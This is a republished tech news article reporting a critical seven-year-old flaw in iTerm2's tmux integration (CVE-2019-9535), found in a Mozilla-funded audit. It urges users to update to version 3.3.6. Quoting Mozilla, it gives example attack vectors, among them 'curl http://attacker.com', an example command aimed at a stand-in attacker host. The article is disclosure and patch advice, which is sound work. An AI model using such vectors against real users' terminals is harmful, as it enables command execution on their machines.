Thursday, March 4, 2021
  • Setup menu at Appearance » Menus and assign menu to Top Bar Navigation
Advertisement
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News
No Result
View All Result
NikolaNews
No Result
View All Result
Home Internet Security

Patch now, Mac users: Critical 7-year-old flaw in open-source macOS app iTerm2

October 13, 2019
in Internet Security
Patch now, Mac users: Critical 7-year-old flaw in open-source macOS app iTerm2
586
SHARES
3.3k
VIEWS
Share on FacebookShare on Twitter

Two strange (and impractical) ways to hack an iPhone and a Mac
For most people, the security that Apple has baked into an iPhone or Mac is more than enough. But determined criminals can find creative ways to bypass the locks to get at your data. Should you be worried?

The makers of iTerm2, a popular open-source terminal emulator app for macOS, have released a patch to address a critical flaw discovered during an audit sponsored by Firefox-maker Mozilla. 

You might also like

Google takes next steps towards ‘privacy-first’ web devoid of third-party cookies

Ursnif Trojan has targeted over 100 Italian banks

Microsoft account hijack vulnerability earns bug bounty hunter $50,000

Any developers or admins using the iTerm2 app should install the available patch immediately, judging by Mozilla’s description, and it sounds like the bug could be exploited in as yet unknown ways.  

“An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer,” Mozilla’s Tom Ritter writes. 

“Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” 

SEE: Six in-demand programming languages: Getting started (free PDF)    

The bug was found in the tmux integration feature of iTerm2, where it’s been lurking for seven years. 

Mozilla opted to support the audit of iTerm2 because of its popularity with developers and admins, funding the audit from the Mozilla Open Source Support Program (MOSS). The audit was carried out by not-for-profit security consultancy Radically Open Security. MOSS has also supported the Tor Project, Tails, and whistleblower tip system SecureDrop.   

iTerm2 serves the same purpose as the native Terminal macOS app for those who use the command line. 

Mozilla notes that the vulnerability, which has been assigned the identifier CVE-2019-9535, does require some user interaction to exploit it. But because it can be exploited by commands, it is potentially dangerous. 

“This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2,” iTerm2 developers explain in a note urging users to update. 

The fix is available in version 3.3.6 of iTerm 2, which was released on October 9, a few days after a separate update that does not address the flaw. 

iTerm2’s audit was sponsored by the third tranche of the MOSS, which Mozilla created after the 2014 disclosure of Heartbleed, the bug in OpenSLL, a widely-used open-source library for protecting communications between browsers and websites.  

Credit: Zdnet

Previous Post

Delusional Antonio Brown Clings to Ill-Fated Fantasy of NFL Comeback

Next Post

5 innovative ways the ad industry can leverage machine learning

Related Posts

Google takes next steps towards ‘privacy-first’ web devoid of third-party cookies
Internet Security

Google takes next steps towards ‘privacy-first’ web devoid of third-party cookies

March 4, 2021
Ursnif Trojan has targeted over 100 Italian banks
Internet Security

Ursnif Trojan has targeted over 100 Italian banks

March 4, 2021
Microsoft account hijack vulnerability earns bug bounty hunter $50,000
Internet Security

Microsoft account hijack vulnerability earns bug bounty hunter $50,000

March 3, 2021
Malaysia Airlines suffers data security ‘incident’ spanning nine years
Internet Security

Malaysia Airlines suffers data security ‘incident’ spanning nine years

March 3, 2021
Remote work: 5 things every business needs to know
Internet Security

Remote work: 5 things every business needs to know

March 3, 2021
Next Post
5 innovative ways the ad industry can leverage machine learning

5 innovative ways the ad industry can leverage machine learning

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

Plasticity in Deep Learning: Dynamic Adaptations for AI Self-Driving Cars

January 6, 2019
Microsoft, Google Use Artificial Intelligence to Fight Hackers

Microsoft, Google Use Artificial Intelligence to Fight Hackers

January 6, 2019

Categories

  • Artificial Intelligence
  • Big Data
  • Blockchain
  • Crypto News
  • Data Science
  • Digital Marketing
  • Internet Privacy
  • Internet Security
  • Learn to Code
  • Machine Learning
  • Marketing Technology
  • Neural Networks
  • Technology Companies

Don't miss it

Deno 1.8 preps for GPU-accelerated machine learning
Machine Learning

Deno 1.8 preps for GPU-accelerated machine learning

March 4, 2021
3 Types of Image Segmentation. If you are getting started with Machine… | by Doga Ozgon | Feb, 2021
Neural Networks

3 Types of Image Segmentation. If you are getting started with Machine… | by Doga Ozgon | Feb, 2021

March 4, 2021
How to Get More Marketing-Qualified Leads
Marketing Technology

How to Get More Marketing-Qualified Leads

March 4, 2021
Six courses to build your technology skills in 2021 – IBM Developer
Technology Companies

Why developers should centralize their security – IBM Developer

March 4, 2021
Google takes next steps towards ‘privacy-first’ web devoid of third-party cookies
Internet Security

Google takes next steps towards ‘privacy-first’ web devoid of third-party cookies

March 4, 2021
Replacing EDR/NGAV with Autonomous XDR Makes a Big Difference for Small Security Teams
Internet Privacy

Replacing EDR/NGAV with Autonomous XDR Makes a Big Difference for Small Security Teams

March 4, 2021
NikolaNews

NikolaNews.com is an online News Portal which aims to share news about blockchain, AI, Big Data, and Data Privacy and more!

What’s New Here?

  • Deno 1.8 preps for GPU-accelerated machine learning March 4, 2021
  • 3 Types of Image Segmentation. If you are getting started with Machine… | by Doga Ozgon | Feb, 2021 March 4, 2021
  • How to Get More Marketing-Qualified Leads March 4, 2021
  • Why developers should centralize their security – IBM Developer March 4, 2021

Subscribe to get more!

© 2019 NikolaNews.com - Global Tech Updates

No Result
View All Result
  • AI Development
    • Artificial Intelligence
    • Machine Learning
    • Neural Networks
    • Learn to Code
  • Data
    • Blockchain
    • Big Data
    • Data Science
  • IT Security
    • Internet Privacy
    • Internet Security
  • Marketing
    • Digital Marketing
    • Marketing Technology
  • Technology Companies
  • Crypto News

© 2019 NikolaNews.com - Global Tech Updates